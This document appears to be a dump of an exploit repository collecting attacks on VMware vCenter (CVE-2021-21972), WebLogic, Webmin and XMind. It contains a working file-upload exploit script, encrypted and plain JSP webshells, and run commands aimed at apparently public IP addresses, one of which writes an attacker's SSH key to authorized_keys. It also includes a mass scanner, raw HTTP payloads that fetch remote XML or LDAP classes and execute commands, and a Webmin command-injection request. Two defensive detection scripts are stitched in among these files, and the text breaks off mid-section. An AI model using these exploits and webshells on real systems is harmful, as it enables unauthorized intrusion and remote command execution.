- ~~vCenter 6.5 Linux(VCSA)/Window **Waiting For Test**~~
- ~~vCenter 6.7 Linux(VCSA)/Window **Waiting For Test**~~
- ~~vCenter 7.0 Linux(VCSA)/Window **Waiting For Test**~~

# Details

1. The vulnerability is an arbitrary file upload
2. The vulnerable endpoint is `/ui/vropspluginui/rest/services/uploadova`; full path: `https://domain.com/ui/vropspluginui/rest/services/uploadova`
3. The `tar` file in the repository's `payload` folder is the default Behinder (冰蝎) 3 webshell

# Screenshots

## Runtime

![3.png](/img/3.png)

## Success



![1.png](/img/1.png)

![1.png](/img/2.png)

# Disclaimer

- This tool is intended only for security testing and research by security personnel; any direct or indirect consequences and losses caused by unauthorized testing are the sole responsibility of the user.
- The tool is only used for security testing and research by security personnel.
Any direct or indirect consequences and losses caused by unauthorized testing are the responsibility of the user.
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/payload/Linux/shell.jsp: --------------------------------------------------------------------------------
```jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/* the key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond */session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/start.sh: --------------------------------------------------------------------------------
```sh
python3 ./CVE-2021-21972/CVE-2021-21972.py -url https://218.21.239.158:22222
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972.py: --------------------------------------------------------------------------------
```python
#!/usr/bin/python3

import argparse
import requests
import tarfile
import urllib3

# disable ssl warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'

def check(ip):
    # The script treats a 405 from an unauthenticated GET to the upload
    # endpoint as the signature of a vulnerable host.
    r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
    if r.status_code == 405:
        print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
        return True
    else:
        print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
        return False

def make_traversal_path(path, level=5, os="unix"):
    # Prefix the destination path with `level` parent-directory segments in
    # the separator style of the target OS.
    if os == "win":
        traversal = ".." + "\\"
        fullpath = traversal*level + path
        return fullpath.replace('/', '\\').replace('\\\\', '\\')
    else:
        traversal = ".." + "/"
        fullpath = traversal*level + path
        return fullpath.replace('\\', '/').replace('//', '/')

def archive(file, path, os):
    # Store the local file under the traversal name inside exploit.tar.
    tarf = tarfile.open('exploit.tar', 'w')
    fullpath = make_traversal_path(path, level=5, os=os)
    print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
    tarf.add(file, fullpath)
    tarf.close()
    print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')

def post(ip):
    r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
    if r.status_code == 200 and r.text == 'SUCCESS':
        print('[+] File uploaded successfully')
    else:
        print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
        print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)

if __name__ == "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-f', '--file', help='The file to tar')
    parser.add_argument('-p', '--path', help='The path to extract the file to on target')
    parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
    args = parser.parse_args()

    vulnerable = check(args.target)

    if vulnerable and (args.file and args.path and args.operating_system):
        archive(args.file, args.path, args.operating_system)
        post(args.target)
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/README.md: --------------------------------------------------------------------------------
# CVE-2021-21972
Proof of Concept Exploit for vCenter CVE-2021-21972

Research credit to: https://swarm.ptsecurity.com/unauth-rce-vmware/, http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/

Tested on both Windows and Unix vCenter VCSA targets.


## Usage
To benignly check if the target is vulnerable just supply the --target argument.

To exploit provide the --file, --path, and --operating-system flags.
Write the file supplied in the --file argument to the location specified in the --path argument.

## Windows Targets:
Tested by uploading the webshell cmdjsp.jsp to the /statsreport endpoint as indicated by PtSwarm. The webshell executes commands in the context of NT AUTHORITY/SYSTEM.

![WindowsExec](Windows-Exec.png)

![WindowsProof](CVE-2021-21972-Windows-Proof.png)

## Unix Targets:
The file will be written in the context of the vsphere-ui user.
If the target is vulnerable, but the exploit fails, it is likely that the vsphere-ui user does not have permissions to write to the specified path.

If writing the vsphere-ui user's SSH authorized_keys, when SSH'ing with the keys it was observed in some cases that the vsphere-ui user's password had expired and forced you to update it (which you cannot because no password is set).
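The `make_traversal_path` helper in the script above works only because the upload handler extracts archive member names verbatim, so `../` (or `..\`) prefixes land the file outside the intended directory. As an added example, not horizon3ai's or VMware's code, the check below inspects each member of an uploaded tar before extraction and reports the entries that would escape the extraction directory, including absolute names, escaping symlink targets and device nodes; the directory `/var/tmp/upload`, the helper `build_tar` and the sample member names are constructed placeholders.

```python
"""Flag tar members that would escape the extraction directory (added example)."""
import io
import posixpath
import tarfile
from typing import List


def _escapes(dest: str, name: str) -> bool:
    """True if `name`, joined to `dest`, resolves outside `dest`.

    Backslashes count as separators because the Windows variant of the exploit
    builds '..\\' prefixes; `dest` must already be normalised.
    """
    name = name.replace("\\", "/")
    if posixpath.isabs(name):
        return True
    target = posixpath.normpath(posixpath.join(dest, name))
    return not (target == dest or target.startswith(dest + "/"))


def unsafe_members(tar_bytes: bytes, dest: str = "/var/tmp/upload") -> List[str]:
    """Return member names that must not be extracted into `dest`."""
    dest = posixpath.normpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            if _escapes(dest, m.name):
                bad.append(m.name)           # '../'-style or absolute name
            elif m.issym() or m.islnk():
                # Symlink targets are relative to the member's directory,
                # hard-link targets to the archive root.
                base = posixpath.dirname(m.name) if m.issym() else ""
                if _escapes(dest, posixpath.join(base, m.linkname)):
                    bad.append(m.name)
            elif m.isdev():
                bad.append(m.name)           # never create device nodes
    return bad


def build_tar(entries) -> bytes:
    """Constructed test helper: build an in-memory tar from (name, bytes) or
    (name, None, link_target) tuples; a link target makes a symbolic link."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for entry in entries:
            info = tarfile.TarInfo(entry[0])
            if len(entry) > 2 and entry[2] is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = entry[2]
                tf.addfile(info)
            else:
                info.size = len(entry[1])
                tf.addfile(info, io.BytesIO(entry[1]))
    return buf.getvalue()


# Constructed sample: one benign OVA-style entry plus one traversal entry of
# the shape the exploit script generates ('../' * 5 + path); placeholder paths.
SAMPLE = build_tar([
    ("descriptor.ovf", b"<Envelope/>"),
    ("../../../../../tmp/escaped.txt", b"not an OVA"),
])

if __name__ == "__main__":
    print("rejected members:", unsafe_members(SAMPLE))
```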

![UnixProof](CVE-2021-21972-Unix-Proof.png)
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/cmdjsp.jsp: --------------------------------------------------------------------------------
```jsp
// copied from https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmdjsp.jsp
// note that linux = cmd and windows = "cmd.exe /c + cmd"

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
    String s = null;
    try {
        Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) {
            output += s;
        }
    }
    catch(IOException e) {
        e.printStackTrace();
    }
}
%>

<%=output %>
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/start-for-unix.sh: --------------------------------------------------------------------------------
```sh
python3 ./CVE-2021-21972.py -t 171.88.68.51:9443 -f /home/kali/.ssh/id_rsa.pub -p /home/vsphere-ui/.ssh/authorized_keys -o unix
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/vCenter任意文件上传-batch-detect.py: --------------------------------------------------------------------------------
```python
import requests
import argparse
import urllib3

# disable ssl warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# If you get ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852),
# edit /etc/ssl/openssl.cnf and change TLSv1.2 to TLSv1.0
# Reference: https://stackoverflow.com/questions/59408646/ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl-c852-in-d


ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'

def banner():
    print(
        """
 _______ ________ ___ ___ ___ __ ___ __ ___ ______ ___
 / ____\\ \\ / / ____| |__ \\ / _ \\__ \\/_ | |__ \\/_ |/ _ \\____ |__ \\
| | \\ \\ / /| |__ ______ ) | | | | ) || |______ ) || | (_) | / / ) |
| | \\ \\/ / | __|______/ /| | | |/ / | |______/ / | |\\__, | / / / /
| |____ \\ / | |____ / /_| |_| / /_ | | / /_ | | / / / / / /_
 \\_____| \\/ |______| |____|\\___/____||_| |____||_| /_/ /_/ |____|
Author: ybdt


        """
    )

def check(ip):
    # Each input line may be a bare host[:port] or a full https:// URL.
    try:
        if "https://" in ip:
            r = requests.get(ip + ENDPOINT, verify=False, timeout=10)
        else:
            r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=10)
    except requests.exceptions.ConnectTimeout:
        print('[-] ' + ip + ' ConnectTimeout')
        return False
    except requests.exceptions.ReadTimeout:
        print('[-] ' + ip + ' ReadTimeout')
        return False
    except requests.exceptions.ConnectionError:
        print('[-] ' + ip + ' ConnectionError')
        return False

    # A 405 from the upload endpoint is taken as the vulnerable signature.
    if r.status_code == 405:
        print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
        return True
    else:
        print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
        return False

def main():
    banner()

    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--inputfile", help="The file contains ips, one per line", required=True)
    args = parser.parse_args()

    # Hosts that answered 405 are appended to vulnerable.txt, one per line.
    with open(args.inputfile, "r") as f_r:
        with open("vulnerable.txt", "w") as f_w:
            lines = f_r.readlines()
            for line in lines:
                line = line.strip("\n").strip("\r\n")
                vulnerable = check(line)
                if vulnerable:
                    f_w.write(line + "\n")

main()
```
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/readme.md: --------------------------------------------------------------------------------
1. Try to obtain the target's version
2. Look up the version corresponding to the Build Number in the version comparison table: https://kb.vmware.com/s/article/2143832
3. Determine whether the target version falls within the vulnerable range

### CVE-2015-2342
Vulnerability reference: https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2342&scoretype=cvssv2
```
The JMX RMI service in VMware vCenter Server
5.0 before u3e
5.1 before u3b
5.5 before u3
6.0 before u1
does not restrict registration of MBeans, which allows remote malicious users to execute arbitrary code via the RMI protocol.
```
Exploitation reference: https://github.com/mogwaisec/mjet
/Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/0.png
--------------------------------------------------------------------------------
/Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
Oracle WebLogic: a popular Java application server

# 0x01 Reproduction environment
Reproduction environment: locally built (win10 1909)
Reproduced version: WebLogic v12.2.1.4.0
Environment setup:
See the environment setup section of [https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA](https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA)

# 0x02 Exploitation conditions
Requires being logged in to the WebLogic console

# 0x03 Affected versions
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0

# 0x04 Vulnerability reproduction
Attack environment: kali x64
Download JNDIExploit: https://github.com/feihong-cs/JNDIExploit/releases/download/v.1.11/JNDIExploit.v1.11.zip
Start JNDIExploit:
```
java -jar ./JNDIExploit-v1.11.jar -i 192.168.1.5   # 192.168.1.5 is the IP of the local machine
```
Log in to the WebLogic console
Refresh the WebLogic console, intercept the request with Burp, and replace it with the following payload
```
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;5:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.1.7:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
cmd:whoami
Referer: http://192.168.1.7:7001/console/login/LoginForm.jsp
Connection: close
Cookie: ADMINCONSOLESESSION=-XjUGJChfEBvqXqZBo748vnBGr895IIDGF5cmnoR9HkR_uY8Hrfd!-1181708775
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

As shown below, the whoami command executed successfully
![image](./0.png)

This vulnerability can be chained with the WebLogic unauthenticated access vulnerability (CVE-2020-14882)

# 0x05 Batch script
None

# 0x06 References
https://www.o2oxy.cn/3019.html
--------------------------------------------------------------------------------
/Weblogic/Weblogic前台验证绕过+后台命令执行漏洞复现(CVE-2020-14882、CVE-2020-14883)/readme.md:
--------------------------------------------------------------------------------
Visiting the following URL gives unauthenticated access to the admin console page
```
http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
```

POC WebLogic 10
```
bash
-c
```
```
http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.56.1:8000/evil.xml")
```

POC WebLogic 12
```
http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
```
WebLogic 10 does not have the com.tangosol.coherence.mvel2.sh.ShellSession gadget; it exists only in WebLogic 12. WebLogic 10 does not ship that package, so this cannot be used there.

# References
https://atsud0.me/2020/10/30/CVE-2020-14882%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
--------------------------------------------------------------------------------
/Weblogic/Weblogic前台验证绕过漏洞复现(CVE-2020-14750)/readme.md:
--------------------------------------------------------------------------------
```
http://127.0.0.1:7001/console/images/%252E./console.portal
```

# References
https://www.icode9.com/content-4-1115139.html
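Added detection example (not part of this repository): the two console readmes above both rely on a double-URL-encoded traversal out of an unauthenticated static path (`/console/css/`, `/console/images/`) into `console.portal`, optionally followed by a `handle=` parameter naming a gadget class. The script below double-decodes the request target the way the console does, normalises the path, and flags both patterns over constructed access-log lines; the log lines, the prefix list and the finding labels are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Static-resource prefixes the console serves without a session; a traversal
# out of them to console.portal is the CVE-2020-14882 / CVE-2020-14750 shape.
STATIC_PREFIXES = ("/console/css/", "/console/images/")
# handle= classes the readmes show being used after the bypass (CVE-2020-14883).
DANGEROUS_HANDLES = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support"
    ".FileSystemXmlApplicationContext",
)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Oct/2020:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5123
10.0.0.9 - - [30/Oct/2020:10:00:02 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9876
10.0.0.9 - - [30/Oct/2020:10:00:03 +0000] "GET /console/images/%252E./console.portal HTTP/1.1" 200 9876
10.0.0.9 - - [30/Oct/2020:10:00:04 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22x%22) HTTP/1.1" 200 200
10.0.0.7 - - [30/Oct/2020:10:00:05 +0000] "GET /console/css/main.css HTTP/1.1" 200 300
"""

def decode_twice(s):
    # The console decodes the path twice, so %252e%252e%252f becomes ../
    return unquote(unquote(s))

def classify(line):
    """Return the findings for one access-log line (empty list if benign)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = []
    prefix = next((p for p in STATIC_PREFIXES if url.path.startswith(p)), None)
    if prefix:
        # Normalise after double-decoding: did the request escape the static
        # directory or reach console.portal?
        norm = posixpath.normpath(decode_twice(url.path))
        if not norm.startswith(prefix) or norm.endswith("console.portal"):
            findings.append("console-auth-bypass")
    if any(h in decode_twice(url.query) for h in DANGEROUS_HANDLES):
        findings.append("console-handle-rce")
    return findings

def scan(log_text):
    """Map 1-based line numbers to findings for every suspicious line."""
    return {n: f for n, line in enumerate(log_text.splitlines(), 1)
            if (f := classify(line))}
```

The single-encoded `%2e%2e/` variant is caught by the same path, since decoding an already-decoded string is a no-op.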
--------------------------------------------------------------------------------
/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/0.png
--------------------------------------------------------------------------------
/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/1.png
--------------------------------------------------------------------------------
/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Reproduction environment
Reproduction environment used: https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe
Reproduced version: Webmin 1.910

# 0x01 Exploitation conditions
The password reset feature must be enabled, as shown below
![image](./0.png)
Looking at the Webmin configuration file /etc/webmin/miniserv.conf, you can see that the value of passwd_mode has changed from 0 to 2

# 0x02 Affected versions
Webmin<=1.920

# 0x03 Vulnerability reproduction
Make any request, intercept it with Burp, and modify it to the following packet
```
POST /password_change.cgi HTTP/1.1
Host: 219.153.49.228:41489
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://219.153.49.228:41489/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Connection: close

user=yibudengtian&old=cat /key.txt&new1=123456&new2=123456
```

# 0x04 Pitfalls
Pitfall 1:
![image](./1.png)

# References
https://xz.aliyun.com/t/6040
https://www.cnblogs.com/paperpen/p/11442532.html
--------------------------------------------------------------------------------
/XMind/XMind 2020 XSS漏洞(暂无编号)/pic/a0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/XMind/XMind 2020 XSS漏洞(暂无编号)/pic/a0.png
--------------------------------------------------------------------------------
/XMind/XMind 2020 XSS漏洞(暂无编号)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/XMind/XMind 2020 XSS漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
Seen on the WeChat public account "洛米唯熊"; reference link: https://mp.weixin.qq.com/s/yImhOCX3Xy91XaHtFFUnng

To be clear up front: only the XSS vulnerability was reproduced; the command execution vulnerability was not

Download the latest version (as of 2021/05/10 15:30) from the [official site](https://www.xmind.cn/xmind2020/) and install it

Open XMind, pick any template (SnowBrush here), switch to outline mode, and replace the "Central Topic" with the following code
```